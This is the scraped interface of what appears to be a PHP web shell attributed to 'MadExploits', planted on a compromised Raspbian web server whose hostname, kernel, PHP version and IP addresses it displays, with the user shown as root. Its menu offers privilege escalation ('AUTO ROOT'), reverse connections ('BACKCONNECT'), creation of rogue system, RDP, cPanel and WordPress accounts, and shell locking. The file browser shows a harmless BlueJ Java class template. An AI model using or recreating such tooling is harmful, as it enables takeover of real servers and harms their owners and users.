Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
bluej /
korean /
templates /
newclass /
[ HOME SHELL ]
Name
Size
Permission
Action
README
1.48
KB
-rw-r--r--
abstract.tmpl
564
B
-rw-r--r--
enum.tmpl
259
B
-rw-r--r--
interface.tmpl
430
B
-rw-r--r--
stdclass.tmpl
677
B
-rw-r--r--
unittest.tmpl
660
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stdclass.tmpl
$PKGLINE /** * 여기에 $CLASSNAME 클래스 설명을 작성하십시오. * * @author (작성자 이름) * @version (버전번호나 날짜) */ public class $CLASSNAME { // 인스턴스 변수 - 다음의 예제를 사용자에 맞게 바꾸십시오 private int x; /** * $CLASSNAME 클래스의 객체 생성자 */ public $CLASSNAME() { // 인스턴스 변수의 초기화 x = 0; } /** * 예제 메소드 - 이 주석을 사용자에 맞게 바꾸십시오 * * @param y 메소드의 예제 매개변수 * @return x 더하기 y */ public int sampleMethod(int y) { // 여기에 코드를 작성하십시오. return x + y; } }
Close